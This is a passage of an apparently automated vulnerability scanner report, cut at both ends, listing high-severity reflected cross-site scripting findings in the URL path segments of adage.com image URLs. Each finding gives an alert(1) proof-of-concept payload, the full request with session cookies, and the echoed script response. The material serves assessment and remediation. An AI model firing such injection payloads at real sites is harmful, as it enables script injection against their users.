The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e00f"-alert(1)-"2dd77db2802 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images9e00f"-alert(1)-"2dd77db2802/bottom/menus/cmo_strategy.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8F6F83012B4EF88099112C453668F49DB3281C3B; path=/
Set-Cookie: HMAC=52AAC20049036969B668F4762CCC316107AD124F; path=/
Set-Cookie: HMAC=D43A594AAF1752EFEC1A4E7F49A6516BA0F94A52; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49472
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images9e00f"-alert(1)-"2dd77db2802/bottom/menus/cmo_strategy.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="
...[SNIP]...

1.91. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/cmo_strategy.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92490"-alert(1)-"9e6d89302a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom92490"-alert(1)-"9e6d89302a5/menus/cmo_strategy.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=92B583B58540CFE8EE70085D0937493A33E240E8; path=/
Set-Cookie: HMAC=3C34D9D7D707DA36AB608E319C1412B9498B68C3; path=/
Set-Cookie: HMAC=D524A440B583843150F5D865B79685D93AA09C19; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49472
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom92490"-alert(1)-"9e6d89302a5/menus/cmo_strategy.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.
...[SNIP]...

1.92. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/cmo_strategy.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90b09"-alert(1)-"61f3cf5a7b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus90b09"-alert(1)-"61f3cf5a7b0/cmo_strategy.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=4F2A611755EA6D74DF483958D55CC58DC9B45486; path=/
Set-Cookie: HMAC=224857C242464731B26AF1A216DDCF2D6A6ECC45; path=/
Set-Cookie: HMAC=235B2E38DD2F1A3604F86E15C94DB54DF4C669CF; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49472
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus90b09"-alert(1)-"61f3cf5a7b0/cmo_strategy.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
h
...[SNIP]...

1.93. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/cmo_strategy.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f93be"-alert(1)-"85b419b749b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/cmo_strategy.pngf93be"-alert(1)-"85b419b749b?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=08D3D1A281195607392DB659F97E57EB3A707F3E; path=/
Set-Cookie: HMAC=559E4DAFD1F816965019FE0266E357832EDFA742; path=/
Set-Cookie: HMAC=6A1E0F8222E88FF3EC431B136C080FFEF8FB044D; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49472
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
n.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/cmo_strategy.pngf93be"-alert(1)-"85b419b749b"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.94. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/datacenter.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9ad"-alert(1)-"16da5250f4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images1b9ad"-alert(1)-"16da5250f4e/bottom/menus/datacenter.png?1302560559 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8E932249DD6BA16EF69741997348A155E8486834; path=/
Set-Cookie: HMAC=535A756555D3A975DF1E87A7F938C5A30E9DE0CA; path=/
Set-Cookie: HMAC=255909911117FD37A38A743FC039778CC5E63BA3; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302560559";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images1b9ad"-alert(1)-"16da5250f4e/bottom/menus/datacenter.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.
...[SNIP]...

1.95. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/datacenter.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e969"-alert(1)-"260bf1a16d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom1e969"-alert(1)-"260bf1a16d/menus/datacenter.png?1302560559 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=83D7EC139381C9615924796AF791BD217FE6185E; path=/
Set-Cookie: HMAC=C4549C2AA0B056E578126FCC855CB69288F75728; path=/
Set-Cookie: HMAC=C211744484D3967AB7ECF3B4BA00F1E95FCB4C35; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49469
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302560559";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom1e969"-alert(1)-"260bf1a16d/menus/datacenter.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js
...[SNIP]...

1.96. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/datacenter.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3352"-alert(1)-"c3b712d34b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menuse3352"-alert(1)-"c3b712d34b1/datacenter.png?1302560559 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=A08700AA7425029970CEC6D301A20A18E96886BB; path=/
Set-Cookie: HMAC=7EA1DF067C0D518CD05DAD61CAB595E5AB0D1531; path=/
Set-Cookie: HMAC=E23A6FC78686821C617C310E92C6C2345583527E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302560559";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menuse3352"-alert(1)-"c3b712d34b1/datacenter.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx
...[SNIP]...

1.97. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/datacenter.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae52"-alert(1)-"a2d3540830b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/datacenter.pngdae52"-alert(1)-"a2d3540830b?1302560559 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=AD989EF65F79D5698E3E6E0B9B6585CE0C818823; path=/
Set-Cookie: HMAC=FD9053CBE8F8535343ED5FE421BF9CD360421B45; path=/
Set-Cookie: HMAC=B9210243489D1A35995B74FAB49F802B29DBD514; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302560559";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/datacenter.pngdae52"-alert(1)-"a2d3540830b"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.98. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/digital.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 253e4"-alert(1)-"8f75231b492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images253e4"-alert(1)-"8f75231b492/bottom/menus/digital.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=909F1876301078C02F9F3E2A65D09A75380B6BA9; path=/
Set-Cookie: HMAC=2D0A490135FD6FE2932A44055BA7BA42DE91AA5C; path=/
Set-Cookie: HMAC=EF756129A066F3C5F8EDBCF1AD91E1EFB92947AF; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images253e4"-alert(1)-"8f75231b492/bottom/menus/digital.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms
...[SNIP]...

1.99. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/digital.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31ca1"-alert(1)-"e9fec1e377d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom31ca1"-alert(1)-"e9fec1e377d/menus/digital.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=7D79A502CAA18AE76C21497230072EC3DBD2496D; path=/
Set-Cookie: HMAC=38D7E3079ACE406C524E1FB920434C996FF74234; path=/
Set-Cookie: HMAC=CAB5C8D70E37B8B2D433A9728AB001EFB7BEA2F0; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom31ca1"-alert(1)-"e9fec1e377d/menus/digital.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.100. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/digital.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b9b"-alert(1)-"ea04503a836 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus10b9b"-alert(1)-"ea04503a836/digital.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8B72401D9A78C00ACBEB3E5C11FE2019B32A89DB; path=/
Set-Cookie: HMAC=57E3CEF8D35AE99BF2E10074F677BA6034E30308; path=/
Set-Cookie: HMAC=D5BD1C5962F97AA8E89431093F9858ADE5812F00; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
